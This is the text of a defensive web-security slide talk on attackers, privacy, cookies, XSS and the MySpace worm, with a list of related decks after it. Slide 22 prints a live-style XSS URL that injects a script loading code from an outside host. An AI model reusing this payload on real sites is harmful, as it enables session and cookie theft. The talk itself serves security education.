becoming paranoid
play

Becoming Paranoid Or how I learned to start worrying and fear the - PowerPoint PPT Presentation

Aug 15, 2023 •322 likes •659 views

Becoming Paranoid Or how I learned to start worrying and fear the Internet George V. Neville-Neil www.neville-neil.com Why This Talk? To make all of you more paranoid Give people a grounding in current problems with securing internet

  1. Becoming Paranoid Or how I learned to start worrying and fear the Internet George V. Neville-Neil www.neville-neil.com

  2. Why This Talk? • To make all of you more paranoid • Give people a grounding in current problems with securing internet services • Show that any technology can be used insecurely • Discuss very briefly what might be done to help www.neville-neil.com 2

  3. What this talk is not about • Cryptography • Encryption • Math www.neville-neil.com 3

  4. The World is a Dangerous Place • Who is trying to attack your systems? • Why are they attacking your systems? - What is the attacker’s motivation? • How are they attacking your systems? • Where are they attacking your systems? www.neville-neil.com 4

  5. Who is Attacking You? • Thieves - Looking for economic gain • Stalkers - Trying to find their prey • Anti-social elements - Just out to cause problems - There are a lot of these people out there • Your own mistakes - Sometimes we are our own worst enemies • Employees - Why would you trust people you work with? www.neville-neil.com 5

  6. How Are You Attacked? • Social engineering - Calling/IMing Employees - Phishing • Direct attacks - Exploiting bugs in your APIs - Denial of Service Attacks (DOS and DDOS) • Eavesdropping • Stealing Credentials • Sharing Credentials • Internal Leaks • Competitors • Parasites www.neville-neil.com 6

  7. Where Are They? • Other users sharing a computer - Are your users practicing safe computing? • Intranetworkers - If your users share a network they are vulnerable. • Net Nasties and Script Kiddies - They’re outside the firewall, so you must be safe. • In the next office! - Just because someone works with you does not mean they should be trusted. www.neville-neil.com 7

  8. Security Realities and Perceptions • User data must be kept safe • Users must believe their data to be safe • Certain types of security breaches are more harmful because of what the users think - Phishing attempts - Leaks of personal data - Email that seems to originate from the user’s account - Loss of access • Most internet companies live and die by their reputation www.neville-neil.com 8

  9. Personal Information Breaches • Card Systems: 40 Million Accounts • Bank of America: Loses Data Tapes with over a million records • Ernst and Young: Lost Laptop with tax data • T-Mobile: Paris Hilton’s Cell Phone Hacked • US Dept. of Veteran Affairs: Lost 26.5 million records - Lawsuit could cost the gov’t 13.5 Billion USD • Everyone handles personal information www.neville-neil.com 9

  10. One More Thing to Fear • Microsoft had one extra word in their Passport description - They said it had high security • The FTC disagreed - Claimed it had normal , good , or industry typical security • Resulting Consent Decree cost Microsoft $200,000,000.00 USD • Any one flaw in just one entrypoint for your system can cost you similar amounts. • There's a long line of people looking for a reason to visit you under less-than-pleasant circumstances. www.neville-neil.com 10

  11. What are we trying to protect against? • Compromise of the user’s private data • Running afoul of the law • Abuse of the companies resources • Loss of money www.neville-neil.com 11

  12. Privacy • Privacy is a highly localized concept • What might be private in one culture might not be in another • Different governments have different rules for privacy and data retention • Global rules and laws are in direct conflict with each other • It is not possible to comply with all sets of rules in all countries simultaneously www.neville-neil.com 12

  13. Internet Startup • You have 20 people • Everyone has access to everything • Everything is “open” • Collaboration is king • Anyone who knows who “root” is has the password • Databases are available to everyone www.neville-neil.com 13

  14. Publicly Traded Company • More than 20 employees • People only see data on a need to know basis • Even people who know who “root” is cannot have root access • Databases are not readable my most of the company • This can harm collaboration and slow development • What is really needed is a framework for handling your data www.neville-neil.com 14

  15. Strategies for Protecting Privacy • Delete and anonymize what you can • Federating data • Only give out data on a need to know basis • Design all systems so that only a few people need to access data • Make sure people have to collude to violate the security of the system - Split keys www.neville-neil.com 15

  16. User Management Issues • If you have users you will need a tool to manage them • There will be people, such as Customer Care, who will need to work with your users’ data • Track everything that the tool does - Reads - Writes - Deletes • Check your logs www.neville-neil.com 16

  17. Non Technical Strategies • Have a clear, documented, privacy policy • Always follow the policy • Have clear terms of service • Make sure the TOS is always recorded • Get good lawyers www.neville-neil.com 17

  18. Internet Security? • Internet security mostly revolves around cookies and the Browser Security Model • In a global enterprise true sessions do not scale • Internet companies use cookies to act as user credentials • Stealing a user’s cookies is the same as stealing their password, for a time www.neville-neil.com 18

  19. Browser Security Model • Browsers only send cookies to servers that set them * • The browser determines whether to send the cookies based on the domain name in the URL • mail.google.com and mail.msn.com should never overlap www.neville-neil.com 19

  20. Browser Tricks • Feb 2005: Bug reported in all browsers BUT Internet Explorer - Internationalized domain names could fool the browser - www.paypal.com <- Normal Version - www.p a ypal.com <- Japan double byte ‘a’ • Oct 2004: IE Bug allows javascript function renaming - Loading certain HTML would replace a previously defined function • The biggest problem is your company doesn’t control the browser - Must depend on others for a fix - Exploits are hard or impossible to mitigate in some cases www.neville-neil.com 20

  21. Cross Site Scripting • The ability of an attacker to execute code within your domain • Has several deleterious side effects • Stealing cookies • Changing data the user sees - Search results - News - Login pages www.neville-neil.com 21

  22. XSS Attack http://www.bbc.co.uk/bbcone/listings/ index.shtml?service_id=4223&DAY=today%22% 3E%3Cscript%20src=http:// www.securitylab.ru/test/sc.js%3E%3C/ script%3E%3C!-- www.neville-neil.com 22

  23. XSS Details www.neville-neil.com 23

  24. A URL is an API • It is important to realize that a URL to which users can POST is the same as a function call in an application • More dangerous than function calls because the caller can be anyone • Can lead to many different problems - Information leakage - Denial of Service - Attacker controlling your application www.neville-neil.com 24

  25. The MySpace Worm • User’s on MySpace can say that another user is their “Hero” • Since MySpace URLs are constant for each user it was easy to find the hero list • A single user was able to become the hero of over 1 million users • The entire site had to go down for 24 hours for repairs • This was a mostly benign worm! • The move to AJAX and “Web 2.0” will accelerate these problems www.neville-neil.com 25

  26. Thinking About Your Data • Often people don’t think about what they’re storing • Most programmers, and most people, are optimists • “It can’t happen here!” • “All for the best in the best of all possible worlds.” - Pangloss www.neville-neil.com 26

  27. What Might Need to Be Secret? • Payment instruments - Credit card numbers - Bank Accounts - Smart Card IDs • Data that helps track the user - Where payments were made - How much was paid at a location - Items that were bought - Map locations - Travel itineraries - Saved user searches • And much much more - Think about what you wouldn’t want your neighbors to know about you www.neville-neil.com 27

  28. Keys and Passwords • Must be kept secret • Do not store a key somewhere where it’s easy to find - In the source code - In a configuration file - In CVS - In a spreadsheet - On a laptop - In a Windows Share www.neville-neil.com 28

  29. Where do Internet Bugs Come From? • Schedule Pressure • Undue Optimism - Thinking things are simpler than they really are - The code runs, Mission Accomplished! • Lack of design • Poor quality of craftsmen • Lack of education • A reversal of fortunes - Be conservative in what you do, be liberal in what you accept from others [RFC-793] www.neville-neil.com 29

  30. Personal Top 5 List • Lack of Input Validation • Trusting the user • Improper use of threading • Not understanding networking • Trusting the platform www.neville-neil.com 30

  31. Basic Principles of Good Paranoia • Know what you’re trying to do before doing it • Keep things simple - The fewer things you need to trust the safer you will be • Peer Review • Don’t believe in magic bullets - The Magic Medicine (Japan, China , and much of Asia) - The Arrow of Ram (India) Systems Thinking is the most important skill! www.neville-neil.com 31

Recommend

Jerry: Linda, do you think Im paranoid? Linda: Youre not really paranoid if

Jerry: Linda, do you think Im paranoid? Linda: Youre not really paranoid if

Jerry: Linda, do you think Im paranoid? Linda: Youre not really paranoid if everyone really is after you, Jerry. Jerry: Maybe all security people are crazy! Linda: No, theyre just insecure. Everything You

444 views • 17 slides
How to be a paranoid Dates of birth or just think like one Exposure to identity theft

How to be a paranoid Dates of birth or just think like one Exposure to identity theft

Leaking information Stealing 26.5 million veteran s data Pro rotection a and S d Securi rity Data on laptop stolen from employee s home (5/06) Veterans names Social Security numbers How to be a paranoid Dates of birth or

337 views • 5 slides
How to be a paranoid or just think like one 1 2 Leaking information Stealing 26.5 million

How to be a paranoid or just think like one 1 2 Leaking information Stealing 26.5 million

Pro rotection a and S d Securi rity How to be a paranoid or just think like one 1 2 Leaking information Stealing 26.5 million veteran s data Data on laptop stolen from employee s home (5/06) Veterans names Social Security

580 views • 30 slides
How to be a paranoid or just think like one 1 2 Leaking information Stealing 26.5 million

How to be a paranoid or just think like one 1 2 Leaking information Stealing 26.5 million

Protection tion and Se Secur urity ity How to be a paranoid or just think like one 1 2 Leaking information Stealing 26.5 million veterans data Data on laptop stolen from employees home (5/06) Veterans names Social Security

619 views • 27 slides
Infrastructure Design For The Professionally Paranoid Or: Ticking The Boxes For Fun And Profit

Infrastructure Design For The Professionally Paranoid Or: Ticking The Boxes For Fun And Profit

Infrastructure Design For The Professionally Paranoid Or: Ticking The Boxes For Fun And Profit Mika Bostrm &lt;mika.bostrom@smarkets.com&gt; Infrastructure Engineer, Information Security Officer[], semi-professional interviewer, Systems

411 views • 19 slides
Intro to Networking for the Insufficiently Paranoid Mihai Christodorescu CS 642 Spring 2007

Intro to Networking for the Insufficiently Paranoid Mihai Christodorescu CS 642 Spring 2007

Intro to Networking for the Insufficiently Paranoid Mihai Christodorescu CS 642 Spring 2007 mihai@cs.wisc.edu Original slides by Jonathon Giffin Internet: Attack and Defenses Makes communication easier and faster Makes attacks

1.05k views • 66 slides
Agility UNC COMP 523 October 5, 2020 Jeff Terrell 1 / 49 Announcements music: Paranoid Android

Agility UNC COMP 523 October 5, 2020 Jeff Terrell 1 / 49 Announcements music: Paranoid Android

Agility UNC COMP 523 October 5, 2020 Jeff Terrell 1 / 49 Announcements music: Paranoid Android by Radiohead, who exhibit great musical agility IMO please join our class on OpenClass.ai before Q4 on Wednesday see Piazza for a link Q1

883 views • 49 slides
Cryptography for the paranoid Daniel J. Bernstein (University of Illinois at Chicago, Technische

Cryptography for the paranoid Daniel J. Bernstein (University of Illinois at Chicago, Technische

Cryptography for the paranoid Daniel J. Bernstein (University of Illinois at Chicago, Technische Universiteit Eindhoven) Based on joint work with: Tanja Lange (Technische Universiteit Eindhoven) Christiane Peters (Danmarks Tekniske

1.12k views • 89 slides
Cybercrime Threats and Future Dark Musings from a Professional Paranoid Alex Stamos, Partner

Cybercrime Threats and Future Dark Musings from a Professional Paranoid Alex Stamos, Partner

Cybercrime Threats and Future Dark Musings from a Professional Paranoid Alex Stamos, Partner March 31 st , 2009 https://www.isecpartners.com Our Discussion Today Where are we today? Notes from the security front Recent incidents

754 views • 44 slides
Security Basics - Lessons From a Paranoid Stuart Larsen Yahoo! Paranoids - Pentest

Security Basics - Lessons From a Paranoid Stuart Larsen Yahoo! Paranoids - Pentest

Security Basics - Lessons From a Paranoid Stuart Larsen Yahoo! Paranoids - Pentest Overview Threat Modeling - Common Web Vulnerabilities - Automated Tooling - Modern Attacks - whoami Threat Modeling Analyzing the security of an

558 views • 44 slides
BE PARANOID OR NOT TO BE ? Alize PENEL Linux and Android System Developer Dev Team Member

BE PARANOID OR NOT TO BE ? Alize PENEL Linux and Android System Developer Dev Team Member

BE PARANOID OR NOT TO BE ? Alize PENEL Linux and Android System Developer Dev Team Member Agenda 02 03 01 Network Security Internet socket in Aspects Permission in Android OS Marshmallow INTERNET PERMISSION IN MARSHMALLOW

584 views • 33 slides
Paranoid Habits Part 1: Security Tips Denis Rechkunov @pragmader / pragmader.me Whats this

Paranoid Habits Part 1: Security Tips Denis Rechkunov @pragmader / pragmader.me Whats this

Paranoid Habits Part 1: Security Tips Denis Rechkunov @pragmader / pragmader.me Whats this about? Topics: Authentication Phishing PGP SSH USB Networking Can I trust you, Denis? Trust no one,

531 views • 41 slides
Success breeds complacency. Complacency breeds failure. Only the paranoid survive. Andy Grove,

Success breeds complacency. Complacency breeds failure. Only the paranoid survive. Andy Grove,

Success breeds complacency. Complacency breeds failure. Only the paranoid survive. Andy Grove, former Intel CEO Success breeds complacency. Complacency breeds failure. Only the paranoid survive. Andy Grove, former Intel CEO Success breeds

1.78k views • 146 slides
Homework 5.4 Recall the following theorem from the overconfidence versus paranoia

Homework 5.4 Recall the following theorem from the overconfidence versus paranoia

Homework 5.4 Recall the following theorem from the overconfidence versus paranoia lecture: Theorem . In a zero-sum perfect-information game, both the paranoid and overconfident models will lead you to choose the same strategy s 1 *

860 views • 9 slides
with schizophrenia. Arkhipov Andrei Y. Kudryashov P. Nurbekov M. Strelets V.B. Maslennikova A.

with schizophrenia. Arkhipov Andrei Y. Kudryashov P. Nurbekov M. Strelets V.B. Maslennikova A.

Complex study of hallucinatory- paranoid syndrome in patients with schizophrenia. Arkhipov Andrei Y. Kudryashov P. Nurbekov M. Strelets V.B. Maslennikova A. Comprehensive research method Biochemistry Psycho- Anatomy Physiology

814 views • 28 slides
Agility Practices UNC COMP 523 October 7, 2020 Jeff Terrell 1 / 26 Announcements music:

Agility Practices UNC COMP 523 October 7, 2020 Jeff Terrell 1 / 26 Announcements music:

Agility Practices UNC COMP 523 October 7, 2020 Jeff Terrell 1 / 26 Announcements music: Paranoid Android (try 2) by Radiohead, who exhibit great musical agility IMO using Sakai for the quiz today reminder: if stressed, consider seeking help,

494 views • 26 slides
Crypto Wont Save You Either Peter Gutmann University of Auckland Sound Advice from the USG

Crypto Wont Save You Either Peter Gutmann University of Auckland Sound Advice from the USG

Crypto Wont Save You Either Peter Gutmann University of Auckland Sound Advice from the USG Saw Something, Said Something Saw Something, Said Something (ctd) Youre not paranoid, they really are out to get you BULLRUN Funded to the tune

976 views • 71 slides

More recommend